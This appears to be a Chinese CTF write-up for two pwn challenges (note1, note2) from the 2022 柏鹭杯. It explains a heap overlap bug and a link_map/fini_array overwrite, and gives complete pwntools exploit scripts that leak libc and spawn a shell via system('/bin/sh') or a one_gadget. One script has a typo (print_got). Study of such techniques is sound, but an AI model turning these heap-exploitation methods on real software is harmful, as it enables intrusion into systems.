---
title: 2022 柏鹭杯 pwn Writeup
date: 2022-09-16 06:54:59 +0800
categories:
  - ctf比赛
tags:
  - pwn
  - ctf
permalink: /posts/id=45/
pin: false
published:
---

## note1

![image-20220916152727115](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220916152727115.png)

漏洞点在3功能call会引用一个放在堆上的show功能的地址，以及放在堆上参数

![image-20220916152740387](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220916152740387.png)

在edit_name功能中将堆块释放后未置空就再次申，导致了堆叠

![image-20220916153013589](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220916153013589.png)

利用edit将管理结构体中的堆块地址换成got表的地址泄露libc，再将用同样的方式把ptr+8换成system，ptr换成/bin/sh即可

```python
# _*_ coding:utf-8 _*_
from pwn import *
import sys
import struct
import os
import hashlib
from hashlib import sha256

context.log_level = "debug"
context.arch = "amd64"
# context.terminal = ['cmd.exe', '/c', 'wt.exe', '-w', '0','--title', 'gdb', 'bash', '-c']
context.terminal = ['tmux', 'splitw', '-h']

# p = remote("","")
p = process("./note1")
elf = ELF("./note1")
libc = elf.libc

def dbg():
    gdb.attach(p)
    pause()

#-----------------------------------------------------------------------------------------
s       = lambda data               :p.send(str(data))
sa      = lambda text,data          :p.sendafter(text, str(data))
sl      = lambda data               :p.sendline(str(data))
sla     = lambda text,data          :p.sendlineafter(text, str(data))
r       = lambda num=4096           :p.recv(num)
ru      = lambda text               :p.recvuntil(text)
ia      = lambda                    :p.interactive()
hs256   = lambda data               :sha256(str(data).encode()).hexdigest()
l32     = lambda                    :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
l64     = lambda                    :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
uu32    = lambda                    :u32(p.recv(4).ljust(4,'\x00'))
uu64    = lambda                    :u64(p.recv(6).ljust(8,'\x00'))
int16   = lambda data               :int(data,16)
lg      = lambda s                  :p.success('%s -> 0x%x' % (s, eval(s)))
#-----------------------------------------------------------------------------------------
def add(idx,size,name,tag,func):
    sla("> ",1)
    sla("id: ",idx)
    sla("name_length: ",size)
    p.sendlineafter("name: ",name)
    p.sendlineafter("tag: ",tag)
    sla("func: ",func)

def edit_name(idx,size,name):
    sla("> ",2)
    sla("id: ",idx)
    sla("> ",1)
    sla("name_length: ",size)
    p.sendlineafter("name: ",name)

def edit_tag(idx,tag):
    sla("> ",2)
    sla("id: ",idx)
    sla("> ",2)
    p.sendafter("new tag: ",tag)

def edit_func(idx,func):
    sla("> ",2)
    sla("id: ",idx)
    sla("> ",3)
    sla("func: ",func)  

def call(idx):
    sla("> ",3)
    sla("id: ",idx)

add(0,0x500,'b'*0x100,'', 1)
edit_tag(0,'a' * 8)
edit_func(0, 1)
call(0)
p.recvuntil("aaaaaaaa")
base = uu64()-0x131b
lg('base')
printf_got = base + 0x3FA8

edit_name(0, 0x17, '')
add(1,0x17,'','',1)
edit_name(0, 0x101,'b'*0x20 + p64(0) + p64(base + 0x131b)+p64(print_got))
call(1)
ru("name: ")
libc_base = l64()-0x61c90
lg('libc_base')
system = libc_base + 0x52290
edit_name(0, 0x101,'b' * 0x20 +'/bin/sh\x00' + p64(system))
call(1)
ia()
```

## note2

有2种方法，具体分析可看第一种方法，用house of banana求解：

[https://blog.e4l4.com/posts/IO%E5%88%A9%E7%94%A8%E6%80%BB%E7%BB%93/#note2](https://blog.e4l4.com/posts/IO%E5%88%A9%E7%94%A8%E6%80%BB%E7%BB%93/#note2)

第二种方法是利用任意地址写去修改程序的基地址(link_map)，程序返回时会调用的fini_array数组里的内容，导致触发one_gadget

![image-20220922151335506](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220922151335506.png)

```python
# _*_ coding:utf-8 _*_
from pwn import *
import sys
import struct
import os
import hashlib
from hashlib import sha256

# context.log_level = "debug"
context.arch = "amd64"
context.terminal = ['tmux', 'splitw', '-h']

# p = remote("39.101.69.5","12032")
# p = process('./ld-2.33.so ./TinyNote'.split(),env={'LD_PRELOAD':'./libc-2.33.so'})
p = process("./note2")
elf = ELF("./note2")
libc = ELF("./libc.so.6")

def dbg():
    gdb.attach(p)
    pause()

#-----------------------------------------------------------------------------------------
s       = lambda data               :p.send(str(data))
sa      = lambda text,data          :p.sendafter(text, str(data))
sl      = lambda data               :p.sendline(str(data))
sla     = lambda text,data          :p.sendlineafter(text, str(data))
r       = lambda num=4096           :p.recv(num)
ru      = lambda text               :p.recvuntil(text)
ia      = lambda                    :p.interactive()
hs256   = lambda data               :sha256(str(data).encode()).hexdigest()
l32     = lambda                    :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
l64     = lambda                    :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
uu32    = lambda                    :u32(p.recv(4).ljust(4,'\x00'))
uu64    = lambda                    :u64(p.recv(6).ljust(8,'\x00'))
int16   = lambda data               :int(data,16)
lg      = lambda s                  :p.success('%s -> 0x%x' % (s, eval(s)))
#-----------------------------------------------------------------------------------------

def add(idx,size,con=''):
    sla("> ",1)
    sla("> ",idx)
    sla("> ",size)
    p.sendlineafter("Enter content: ",con)

def show(idx):
    sla("> ",3)
    sla("> ",idx)

def dele(idx):
    sla("> ",2)
    sla("> ",idx)


for i in range(10):
    add(i,0x90)
for i in range(8):
    dele(i)
show(7)
libc_base = l64()-0x219ce0
lg('libc_base')
link_map = libc_base+0x2712e0

show(0)
key = u64(p.recv(5).ljust(8,'\x00'))
lg("key")
heap_base = key<<12
lg("heap_base")

dele(8)
add(0,0x90)
dele(8)

add(1,0xc0,'a'*0xa0+p64((link_map)^key))
add(2,0x90,p64(libc_base + 0xebcf1))# +0x7a0
add(3,0x90,p64(heap_base+0x7a0-0x3d78))
sla("> ",4)

ia()
```



